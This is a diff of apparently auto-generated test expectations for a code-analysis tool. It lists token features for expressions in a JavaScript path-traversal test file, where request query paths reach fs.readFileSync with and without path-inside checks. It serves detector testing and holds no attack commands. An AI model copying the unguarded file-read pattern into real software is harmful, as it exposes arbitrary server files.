pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:23 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:316:6:316:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:316:6:316:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:316:6:316:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:316:6:316:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:316:6:316:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:316:19:316:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:316:19:316:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:316:19:316:22 | path | calleeImports | fs | @@ -9361,6 +77924,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:316:19:316:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:316:19:316:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:316:19:316:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:320:6:320:19 | normalizedPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:320:6:320:19 | normalizedPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:320:6:320:19 | normalizedPath | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:320:6:320:19 | normalizedPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:320:6:320:19 | normalizedPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:320:6:320:49 | normali ... , path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:320:6:320:49 | normali ... , path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:320:6:320:49 | normali ... , path) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:320:6:320:49 | normali ... , path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:320:6:320:49 | normali ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:320:6:320:49 | normalizedPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:320:6:320:49 | normalizedPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:320:6:320:49 | normalizedPath | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:320:6:320:49 | normalizedPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:320:6:320:49 | normalizedPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:32 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:32 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:32 | pathModule | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:32 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:32 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:37 | pathModule.join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:37 | pathModule.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:37 | pathModule.join | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:37 | pathModule.join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:37 | pathModule.join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:49 | exceptional return of pathMod ... , path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:49 | exceptional return of pathMod ... , path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:49 | exceptional return of pathMod ... , path) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:49 | exceptional return of pathMod ... , path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:49 | exceptional return of pathMod ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:49 | pathMod ... , path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:49 | pathMod ... , path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:49 | pathMod ... , path) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:49 | pathMod ... , path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:320:23:320:49 | pathMod ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:320:34:320:37 | join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:320:34:320:37 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:320:34:320:37 | join | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:320:34:320:37 | join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:320:34:320:37 | join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:320:39:320:42 | SAFE | CalleeFlexibleAccessPath | pathModule.join | | autogenerated/TaintedPath/normalizedPaths.js:320:39:320:42 | SAFE | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:320:39:320:42 | SAFE | calleeImports | path | @@ -9379,6 +77982,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:320:45:320:48 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:320:45:320:48 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:320:45:320:48 | path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:321:6:321:17 | pathIsInside | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:321:6:321:17 | pathIsInside | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:321:6:321:17 | pathIsInside | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:321:6:321:17 | pathIsInside | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:321:6:321:17 | pathIsInside | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:321:6:321:39 | exceptional return of pathIsI ... , SAFE) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:321:6:321:39 | exceptional return of pathIsI ... , SAFE) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:321:6:321:39 | exceptional return of pathIsI ... , SAFE) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:321:6:321:39 | exceptional return of pathIsI ... , SAFE) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:321:6:321:39 | exceptional return of pathIsI ... , SAFE) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:321:6:321:39 | pathIsI ... , SAFE) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:321:6:321:39 | pathIsI ... , SAFE) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:321:6:321:39 | pathIsI ... , SAFE) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:321:6:321:39 | pathIsI ... , SAFE) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:321:6:321:39 | pathIsI ... , SAFE) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:321:19:321:32 | normalizedPath | CalleeFlexibleAccessPath | pathIsInside | | autogenerated/TaintedPath/normalizedPaths.js:321:19:321:32 | normalizedPath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:321:19:321:32 | normalizedPath | calleeImports | path-is-inside | @@ -9395,6 +78013,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:321:35:321:38 | SAFE | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | | autogenerated/TaintedPath/normalizedPaths.js:321:35:321:38 | SAFE | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:321:35:321:38 | SAFE | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:33 | exceptional return of fs.read ... edPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:33 | exceptional return of fs.read ... edPath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:33 | exceptional return of fs.read ... edPath) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:33 | exceptional return of fs.read ... edPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:33 | exceptional return of fs.read ... edPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:33 | fs.read ... edPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:33 | fs.read ... edPath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:33 | fs.read ... edPath) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:33 | fs.read ... edPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:322:3:322:33 | fs.read ... edPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:322:6:322:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:322:6:322:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:322:6:322:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:322:6:322:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:322:6:322:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:322:19:322:32 | normalizedPath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:322:19:322:32 | normalizedPath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:322:19:322:32 | normalizedPath | calleeImports | fs | @@ -9404,6 +78047,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:322:19:322:32 | normalizedPath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:322:19:322:32 | normalizedPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:322:19:322:32 | normalizedPath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:33 | exceptional return of fs.read ... edPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:33 | exceptional return of fs.read ... edPath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:33 | exceptional return of fs.read ... edPath) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:33 | exceptional return of fs.read ... edPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:33 | exceptional return of fs.read ... edPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:33 | fs.read ... edPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:33 | fs.read ... edPath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:33 | fs.read ... edPath) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:33 | fs.read ... edPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:325:3:325:33 | fs.read ... edPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:325:6:325:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:325:6:325:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:325:6:325:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:325:6:325:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:325:6:325:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:325:19:325:32 | normalizedPath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:325:19:325:32 | normalizedPath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:325:19:325:32 | normalizedPath | calleeImports | fs | @@ -9413,6 +78081,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:325:19:325:32 | normalizedPath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:325:19:325:32 | normalizedPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:325:19:325:32 | normalizedPath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:328:6:328:17 | pathIsInside | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:328:6:328:17 | pathIsInside | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:328:6:328:17 | pathIsInside | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:328:6:328:17 | pathIsInside | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:328:6:328:17 | pathIsInside | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:328:6:328:39 | exceptional return of pathIsI ... , SAFE) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:328:6:328:39 | exceptional return of pathIsI ... , SAFE) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:328:6:328:39 | exceptional return of pathIsI ... , SAFE) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:328:6:328:39 | exceptional return of pathIsI ... , SAFE) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:328:6:328:39 | exceptional return of pathIsI ... , SAFE) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:328:6:328:39 | pathIsI ... , SAFE) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:328:6:328:39 | pathIsI ... , SAFE) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:328:6:328:39 | pathIsI ... , SAFE) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:328:6:328:39 | pathIsI ... , SAFE) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:328:6:328:39 | pathIsI ... , SAFE) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:328:19:328:32 | normalizedPath | CalleeFlexibleAccessPath | pathIsInside | | autogenerated/TaintedPath/normalizedPaths.js:328:19:328:32 | normalizedPath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:328:19:328:32 | normalizedPath | calleeImports | path-is-inside | @@ -9429,6 +78112,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:328:35:328:38 | SAFE | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join 